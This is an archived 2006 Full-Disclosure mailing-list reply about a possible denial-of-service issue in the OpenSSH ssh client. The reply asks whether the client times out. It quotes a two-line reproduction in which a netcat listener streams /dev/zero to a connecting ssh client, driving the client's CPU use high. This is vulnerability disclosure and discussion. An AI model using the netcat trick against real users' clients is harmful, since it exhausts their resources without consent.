Re: [Full-disclosure] Possible DOS issue in OpenSSH ssh client
- From: Paul Schmehl <pauls@xxxxxxxxxxxx>
- Date: Tue, 13 Jun 2006 11:22:39 -0500
Espen Grøndahl wrote:
During some testing I found a possible bug/issue with OpenSSH ssh client.What did the ssh client do? Did it eventually time out (as you would expect)? Or did it hang and never disconnect?
MachineA # cat < /dev/zero | nc –l –p 3000
MachineB# ssh someone@MachineA –p 3000
I have tested on OpenBSD 3.9, CentOS 4.3, Debian 3.1 and Solaris 9.
This consumes 50-100% of available CPU time on MachineB ( depending on the
bandwith between them ).
--
Paul Schmehl (pauls@xxxxxxxxxxxx)
Adjunct Information Security Officer
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- References:
- [Full-disclosure] Possible DOS issue in OpenSSH ssh client
- From: Espen Grøndahl
- [Full-disclosure] Possible DOS issue in OpenSSH ssh client
- Prev by Date: Re: Re: [Full-disclosure] repeated port 21 attempts
- Next by Date: Re: [Full-disclosure] Possible DOS issue in OpenSSH ssh client
- Previous by thread: [Full-disclosure] Possible DOS issue in OpenSSH ssh client
- Next by thread: Re: [Full-disclosure] Possible DOS issue in OpenSSH ssh client
- Index(es):
Relevant Pages
|
|
